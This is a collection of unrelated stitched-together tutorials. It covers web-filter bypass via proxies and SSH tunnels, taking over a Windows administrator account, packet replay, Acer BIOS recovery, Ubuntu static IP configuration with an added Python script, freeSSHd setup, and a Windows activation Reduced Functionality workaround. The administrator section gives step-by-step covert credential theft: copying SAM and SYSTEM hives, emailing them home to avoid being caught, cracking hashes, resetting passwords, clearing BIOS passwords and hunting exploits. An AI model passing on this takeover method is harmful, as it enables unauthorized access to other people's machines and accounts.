Finding a private proxy server is a little different, but still not very hard. Some of the most common ports that proxy servers run on are 8080, 80, 6588, and 3128. There are different programs out there that will find proxy servers for you, or you can even use nmap to scan ranges looking for these ports and then test them manually for speed. A little advice though: if you want to find fast private (somewhat private) proxy servers, check the first 20 IP blocks of ISPs and major corporations. Sometimes using a mass resolving tool will allow you to find servers that are named something along the lines of: proxy.blah.com.
Also, programs such as Privoxy will allow you to proxy through your local computer and tunnel that connection to an actual proxy server so you do not have to go looking for working ones. This program can be found at: http://www.privoxy.org/
To learn how to use Privoxy, please RTFM (Read The Fine Manual) they have so graciously put together for you. It's a very good program and I definitely recommend it.
Using Google To Bypass:
The reason Google is such a good tool to bypass web filters is because the people (usually admins) setting up the filters will not block Google, as it's the world's greatest search engine (yes, that is my opinion and I am sticking to it). To use Google to bypass filters for you, just stick the URL on the end of this URL:
http://translate.google.com/translate?hl=en&sl=fr&u=
So if I wanted to go to the website: www.blocked.com I would type into my address bar:
http://translate.google.com/translate?hl=en&sl=fr&u=www.blocked.com
And google will be very happy to translate the website for you, bypassing the web filter that was originally blocking your access.
CGIProxy:
CGIProxy is a CGI script written to act as a proxy. The reason this is a good method is that you can host your own proxy right on a website; once you visit the hosted CGI script you can type in a URL and the script will fetch and display it for you.
A nice easy way of finding hosts running these scripts is Google. Search:
inurl:"cgiproxy"
and enjoy your search results.
Or you can use www.cgiproxy.co.uk
HTTP Tunneling:
Using PuTTY is a great way to tunnel all of your HTTP traffic through an SSH session. The great thing about doing this is that all traffic between you and the SSH server travels through the encrypted tunnel, meaning the web filter sees only an SSH connection and cannot see what the traffic is in order to block it. This is also useful when you are doing any web browsing and don't want people on the local network to be able to sniff the traffic (between the SSH server and the proxy or website the traffic is in the clear again, as usual).
To set up PuTTY, go to Connection -> SSH -> Tunnels on the left within the PuTTY configuration window, set the source port to anything you want, set the destination to the proxy server address, a colon, and the proxy port number (as reachable from the SSH server, since the SSH server is what connects to it), and click Add.
So it would look like this:
Source Port: 8080
Destination: proxyip:8080
Once you do this, establish your connection to your SSH server and set up the proxy connection in the browser of your choice (as we covered earlier in this tutorial), using 127.0.0.1 as the proxy address and the source port (8080 here) as the proxy port. The forwarded port only exists while the PuTTY session is open.
Obtaining The Administrative Account
favorite beverage and continue reading on.
This tutorial is going to explain the different methods of obtaining administrative privileges, such as cracking the administrator's password hash, injecting your own password hash into the administrator's account, and exploiting Windows in such a way that the user account you are using at the time ends up with administrative privileges.
Cracking The Hash:
This is my favorite way of obtaining administrator on a Windows box, mostly because it allows me to know what the administrator's password is, which is often used in more than one place and for more than one purpose.
The administrator's hash is stored in the %windir%\system32\config\SAM file. SAM stands for Security Accounts Manager. This file stores the hashes for all local user accounts on the Windows machine, so you can crack not only the administrator's, but any user's (which is a good thing when you want to know someone's actual password). Two things to know before you grab it: the file is locked by the kernel while Windows is running, so it is normally copied from a boot CD or from a backup; and since Windows 2000 the hashes inside it are encrypted with the SYSKEY boot key, which lives in the SYSTEM hive (%windir%\system32\config\SYSTEM), so copy both files or the dump tools will not be able to decrypt the hashes.
The safest way to crack the administrator's hash from a SAM file is by grabbing a copy of the SAM file and cracking it in another location, such as at home. This ensures that you won't be caught right there cracking it, and if you need to leave a box running to brute-force it without the box being tampered with, you can do so in the safety of your own home. I prefer to e-mail it to myself, but you can use a USB drive also.
There are plenty of programs that will dump the accounts and hashes from the SAM file. I use Cain and Abel on my Windows box. The infamous John the Ripper will then crack the dumped hashes (in pwdump format) for you. Note that XP stores two hashes per account by default: the old LM hash (for passwords of 14 characters or fewer; case-insensitive and split into two independent 7-character halves) and the NT hash. Crack the LM hash first where it is present, since it falls far faster; the NT hash then only has to tell you the letter case. You can either spend your time brute-forcing the hashes, dictionary-attacking the hashes, or just checking whether there is a site online that already has the hashes cracked and stored, such as:
http://securitystats.com/
If it isn't cracked there and it means that much to you, let the brute-forcer run against the hashes for a couple of days.
For wordlists I strongly recommend argon24MB.zip; to find this just type into Google:
intitle:"index of /" "argon24MB.zip"
There is also a version 2 of The Argon, which is a 2GB wordlist file.
Injecting Your Own Hash:
This method is very dangerous, as it changes the administrator's password, and as soon as their password stops working they will realize something is going on. With this method you'll have to be able to boot from a CD, USB drive, or floppy disk. This might mean changing the BIOS boot order, but that shouldn't be a problem. If there is a password on the BIOS, take the CMOS battery off the motherboard for a good minute and a half or so, put it back, and the BIOS password will be gone (along with the rest of the BIOS settings).
The program we will use to inject our own password into the SAM file is called "chntpw" and can be found at:
http://freshmeat.net/projects/chntpw/
Its own documentation recommends blanking the password rather than setting a new one, because setting a new password sometimes fails; you can then log in with an empty password and set whatever you like from inside Windows.
Two live boot CDs that I know for a fact have this utility on them are:
Knoppix-STD (http://www.knoppix-std.org/download.html)
Auditor (http://www.remote-exploit.org/index.php/Auditor_mirrors)
Just boot either one of these CDs on the machine and you'll be greeted by a nice GUI. From there you can run chntpw against the SAM file on the mounted Windows partition and follow the prompts to clear or set the password on the local user account of your choice.
Also, you can use this Emergency BootCD to reset the password of any local user account:
http://ebcd.pcministry.com/
Be very careful when using this method.
Exploiting Windows:
By exploiting Windows I just mean finding an exploit to use against Windows that will either drop you to an administrative (or SYSTEM) command prompt, or that creates a new administrative account for you.
I did a video tutorial on the JPEG buffer overflow exploit, so if you watch that, it should give you an idea of what I am talking about.
Sites you can check for exploits:
www.milw0rm.com
www.packetstormsecurity.org
www.securiteam.com
These sites will let you search for and find exploits that will help you out on your journey to obtaining administrative privileges. If there isn't an exploit that works right off the bat, sit and wait for one to come out, as they do quite often. I suggest learning how to compile source code, as that's what these exploits are going to be: source code that you need to compile in order to run.
Packet Generator
Whenever you write and debug a packet capturing and analyzing program, you are forced to generate packets again and again using some network application. With this packet generator tool, you don't have to. It lets you generate and send packets easily from a given capture file (*.cap) out of a specific network adapter. However, it is better to install and use the virtual network adapter (VirtNet.zip) to avoid putting any traffic load on the real network; replaying a capture also replays its original source addresses, which you do not want on a live segment.
http://www.brothersoft.com/virtual-network-adapter-virtnet-94667.html
Based on WinPcap (http://www.winpcap.org).
Acer Aspire One BIOS Recovery
First format a USB flash drive with FAT.
Download the latest BIOS, extract all files from the zip file, and put both FLASHIT.EXE and the BIOS file with the .FD suffix in the root directory of the drive. The files must not be in a folder. Rename the BIOS file to ZG5IA32.FD; that's important.
Turn the AA1 off with the USB drive still connected, and make sure both the battery and the AC adapter are also connected.
Press Fn+Esc, keep it pressed and press the power button. Release Fn+Esc after a few seconds; the power button will be blinking. Press the power button once. The AA1 will now initiate the BIOS flash; do not interrupt it under any circumstances. After a while the power button will stop blinking, and the AA1 will reboot shortly after. Wait patiently.
The BIOS has been flashed and all settings reset to default.
If it doesn't reboot by itself but the power button still blinks, wait a few minutes before turning it off, and try again.
Howto: Ubuntu Linux convert DHCP network configuration to static IP configuration
My friend wanted to know how to change or convert a DHCP network configuration to a static configuration. After the initial installation, he wanted to change the network settings. Further, his system is without a GUI (X Window System). Here is a quick way to accomplish this:
Your main network configuration file is /etc/network/interfaces
Desired new sample settings:
=> Host IP address 192.168.1.100
=> Netmask: 255.255.255.0
=> Network ID: 192.168.1.0
=> Broadcast IP: 192.168.1.255
=> Gateway/Router IP: 192.168.1.254
=> DNS Server: 192.168.1.254
Open the network configuration file:
$ sudo vi /etc/network/interfaces
OR
$ sudo nano /etc/network/interfaces
Find and remove the dhcp entry:
iface eth0 inet dhcp
Append the new network settings (leave the "auto eth0" line above it in place so the interface still comes up at boot):
iface eth0 inet static
address 192.168.1.100
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.254
Save and close the file. Restart the network (if you are doing this over SSH, your session will drop and you will have to reconnect on the new address):
$ sudo /etc/init.d/networking restart
Task: Define new DNS servers
Open the /etc/resolv.conf file:
$ sudo vi /etc/resolv.conf
Remove the old DNS servers assigned by the DHCP server and enter your own:
search myisp.com
nameserver 192.168.1.254
nameserver 202.54.1.20
nameserver 202.54.1.30
Save and close the file.
Task: Test the DNS server
$ host cyberciti.biz
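The edit above done by script, as an added example that is not part of the original howto: it swaps the "iface eth0 inet dhcp" stanza for a static one, derives the network and broadcast addresses from the address and netmask so they cannot disagree with each other, and refuses a gateway that is outside the subnet, which are the mistakes that most often leave a box unreachable after the restart. The interfaces file content is a constructed sample of a fresh install; the script name and its argument order are this example's own.

```python
"""Convert an /etc/network/interfaces DHCP stanza to a static one.

Added example; not part of the original howto. Assumed usage, as root:
    python3 static_ip.py /etc/network/interfaces eth0 192.168.1.100 255.255.255.0 192.168.1.254
"""
import ipaddress
import re
import shutil
import sys

# Constructed sample of a fresh Ubuntu install's /etc/network/interfaces.
SAMPLE_INTERFACES = """\
# This file describes the network interfaces available on your system
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet dhcp
"""


def static_stanza(iface, address, netmask, gateway):
    """Build the static stanza; network/broadcast are computed, the gateway is sanity-checked."""
    net = ipaddress.ip_network("%s/%s" % (address, netmask), strict=False)
    host, gw = ipaddress.ip_address(address), ipaddress.ip_address(gateway)
    if gw not in net:
        raise ValueError("gateway %s is not inside %s" % (gw, net))
    if host in (net.network_address, net.broadcast_address) or host == gw:
        raise ValueError("%s is not a usable host address in %s" % (host, net))
    return "\n".join([
        "iface %s inet static" % iface,
        "\taddress %s" % host,
        "\tnetmask %s" % net.netmask,
        "\tnetwork %s" % net.network_address,
        "\tbroadcast %s" % net.broadcast_address,
        "\tgateway %s" % gw,
    ])


def convert(text, iface, address, netmask, gateway):
    """Replace 'iface <iface> inet dhcp' (plus any indented option lines) with a static stanza."""
    dhcp_line = re.compile(r"^\s*iface\s+%s\s+inet\s+dhcp\s*$" % re.escape(iface))
    lines = text.splitlines()
    out, i, replaced = [], 0, False
    while i < len(lines):
        if dhcp_line.match(lines[i]):
            out.append(static_stanza(iface, address, netmask, gateway))
            replaced = True
            i += 1
            while i < len(lines) and lines[i][:1] in (" ", "\t"):  # drop the dhcp stanza's options
                i += 1
            continue
        out.append(lines[i])
        i += 1
    if not replaced:
        raise ValueError("no 'iface %s inet dhcp' stanza found; nothing changed" % iface)
    return "\n".join(out) + "\n"


def resolv_conf(nameservers, search=None):
    """Render /etc/resolv.conf; every nameserver must parse as an IP address."""
    lines = ["search %s" % search] if search else []
    lines += ["nameserver %s" % ipaddress.ip_address(ns) for ns in nameservers]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    if len(sys.argv) != 6:
        sys.exit("usage: static_ip.py FILE IFACE ADDRESS NETMASK GATEWAY")
    path, iface, address, netmask, gateway = sys.argv[1:]
    with open(path) as fh:
        updated = convert(fh.read(), iface, address, netmask, gateway)
    shutil.copy2(path, path + ".bak")  # keep the DHCP version to roll back to
    with open(path, "w") as fh:
        fh.write(updated)
    print(updated)
    print("now run: sudo /etc/init.d/networking restart (reconnect on the new address if over SSH)")
```

The script writes a .bak copy before touching the file, so if the restart leaves the box unreachable you can boot to a console, copy the backup over /etc/network/interfaces and restart networking again.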
Network command line cheat sheet
You can also use commands to change settings. Please note that these settings are temporary, not permanent: they are lost at the next reboot or network restart. Use the method above to make network changes permanent, or the GUI tool described below.
Task: Display network interface information
$ ifconfig
Task: Take network interface eth0 down
$ sudo ifconfig eth0 down
OR
$ sudo ifdown eth0
Task: Bring network interface eth0 up
$ sudo ifconfig eth0 up
OR
$ sudo ifup eth0
Task: Change IP address and netmask from the command line
Activate network interface eth0 with a new IP (192.168.1.50) and netmask:
$ sudo ifconfig eth0 192.168.1.50 netmask 255.255.255.0 up
Task: Display the routing table
$ /sbin/route
OR
$ /sbin/route -n
Output:
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
localnet        *               255.255.255.0   U     0      0        0 ra0
172.16.114.0    *               255.255.255.0   U     0      0        0 eth0
172.16.236.0    *               255.255.255.0   U     0      0        0 eth1
default         192.168.1.254   0.0.0.0         UG    0      0        0 ra0
Task: Add a new default gateway
The gateway must be a host address on a directly connected network (a router on one of the subnets listed above), not a network address such as 172.16.236.0. If a default route already exists, delete it first or the add fails with "SIOCADDRT: File exists":
$ sudo route del default
$ sudo route add default gw 192.168.1.254
Task: Display current active Internet connections (servers and established connections)
$ netstat -nat
Task: Display listening ports and the programs that own them
$ sudo netstat -tulp
OR
$ sudo netstat -tulpn
Task: Display network interface stats (RX/TX etc.)
$ netstat -i
Task: Display active (connected) sockets only, with extended information
$ netstat -e
$ netstat -te
$ netstat -tue
Where,
- -t : TCP sockets
- -u : UDP sockets
- -e : extended output (adds the owning user and inode). Note that -e does not mean "established": without -a or -l, netstat lists only connected sockets and leaves out listeners, which is why these commands show active connections.
Add -n to any of these to skip DNS lookups, which makes the output a lot faster.
Task: Test network connectivity
Send an ICMP ECHO_REQUEST to network hosts, routers, servers etc. with the ping command. This verifies that connectivity exists between the local host and the remote system:
$ ping router
$ ping 192.168.1.254
$ ping cyberciti.biz
See "simple Linux system monitoring with ping command and scripts" for more information.
Task: Use the GUI (graphical configuration) network tool
If you are new, use the GUI configuration tool; type the following command at a terminal:
$ network-admin &
The above command starts Ubuntu's GUI tool for configuring network connections.
Final tip - learn how to find out more information about commands
A man page is your best friend when you want to learn more about a particular command or its syntax. For example, read detailed information about the ifconfig and netstat commands:
$ man ifconfig
$ man netstat
Get short help with all command options by appending the --help option to a command:
$ netstat --help
Find out what command is used for a particular task by searching the short descriptions and manual page names for a keyword:
$ man -k 'delete directory'
$ apropos -s 1 remove
Display a short description of a command:
$ whatis rm
$ whatis netstat
How to Setup SSH Server in Windows with freeSSHd
Have you ever wanted to control your Windows machine remotely using the command line? With the SSH network protocol, you can! Telnet is another way to achieve this, but it is not as secure as SSH (it sends your password and everything else in the clear). In this simple guide, I will show you how to set up an SSH server in Windows with freeSSHd.
With this setup, you can access and manage your PC from another computer using the Windows command line. That means that you can copy, edit, move and delete files on your home computer from another computer, in the office for example. Furthermore, the SSH network protocol secures the connection between the two computers! If you are interested, you can read more on SSH.
Step 1: Setup SSH Server in Windows with freeSSHd
This is an absolute noob guide, so I'll explain in detail. If you are an advanced user (boo!), you are welcome to skip the installation steps.
1- freeSSHd is the easiest software to use to get SSH working in Windows. Download freeSSHd before proceeding any further.
2- Double click the freeSSHd installer that you have downloaded to get started.
3- Click Next -> Click Next (or change the default installation directory) -> Click Next (Full Installation) -> Click Next (Start Menu Folder) -> Click Next (Create a desktop icon) -> Click Install (ready to install) -> Wait until the installation has finished -> Click Close (Try other products...)
4- "Do you want to run freeSSHd as a system service?" I choose "No" so I can start freeSSHd manually. This is good security practice, because you don't want applications running in the background when you are not using them. Only turn freeSSHd on when the need for remote connections arises!
5- Click Finish to complete the freeSSHd installation.
Step 2: Run freeSSHd
6- Double click the freeSSHd icon on the desktop to load your SSH server. You can see the freeSSHd icon in your system tray.
7- Right click on the icon and click Settings.
8- Make sure that the freeSSHd settings page (Server Settings tab) shows that your "SSH server is running".
Step 3: Create a New SSH User
9- Click on the Users tab. You need to create at least one user account that will act as your SSH remote user account.
10- Click "Add" to create a new user. Fill in the user details, following the example shown below (with your own unique username and password, duh!). Pick a long password: anyone who can reach the port can try passwords against this account, and a successful login gives them a shell on your machine. Click OK and make sure the user appears in the Users tab list.
Step 4: Test SSH Access with Putty (Local)
11- Using the same computer on which you installed freeSSHd, download PuTTY. PuTTY is a desktop SSH client that you can use to access SSH servers.
12- Double click PuTTY to run it. Fill in the details as shown in the diagram below. 127.0.0.1 means that you are testing the SSH access over a local connection.
13- Press "Yes" on the security alert screen (PuTTY is asking you to trust the server's host key; since you are connecting to your own machine, that is safe). Enter the SSH username and password that you created previously.
14- If you get a Windows command prompt, you have successfully accessed your SSH server! Congratulations!
15- Connect your computer to the Internet / local network and take note of your computer's IP address.
Step 5: Test SSH Access with Putty (Remote)
16- Using another computer, e.g. your office computer, download PuTTY again.
17- Repeat steps 12 to 13 above, but this time use your SSH server's IP address (type it in the Host Name or IP Address field). Compare the host key fingerprint in the security alert with the one you saw in step 13; if it differs, you are not talking to your machine. If the server sits behind a router, you will also need to forward TCP port 22 to it and allow it through the Windows firewall.
18- If you get a Windows command prompt, you have successfully accessed your SSH server from a remote computer! Double congrats to you!
There you go, a complete noob guide to setting up an SSH server in Windows, using the super simple freeSSHd application. Be geeky and try it today!
Bypass Windows Vista's and Windows 7's Reduced Functionality Mode and Get Your Data
So you use Windows 7 or Vista and you have encountered the now famous "Reduced Functionality Mode." You can either throw up your arms and cry, or bypass it and get to your data.
Here is how to temporarily get out of "Reduced Functionality" mode and restore your computer to a (semi) normal state.
- On the Windows Activation screen, click on the "Access your computer with reduced functionality" option.
- Once Internet Explorer loads, click on File in the menu bar and then select Open from the pull-down menu.
- In the Open dialog window, type in C:\Windows\Explorer.exe and then click OK.
- Click the OK button on the "IE needs to open a new window to open this webpage" confirmation prompt.
- Click the Run button on the "File Download - Security Warning" dialog prompt.
- Click the Run button on the "File Download - Security Warning" dialog about an unknown and unverified publisher.
- The user shell (Explorer) will load, and the desktop, taskbar, start menu etc. will be restored.
- The computer has recovered from Reduced Functionality for this session. To stop RFM from coming back, Windows has to be rearmed, which restarts the activation grace period:
- Click on the Windows Start button.
- Type Cmd in the Start Search box.
- A program shortcut will show up in the Start panel search results. Right click on the shortcut and select Run as Administrator.
- In the Command Prompt window, type in the following command and then hit Enter: slmgr.vbs -rearm
- Restart your computer.
Rearming only works a limited number of times (three on Vista and 7), so it buys time rather than fixing anything. Obviously something went awry for that dialog box to pop up, and I think it would be wise to reinstall Windows after you back up all your data.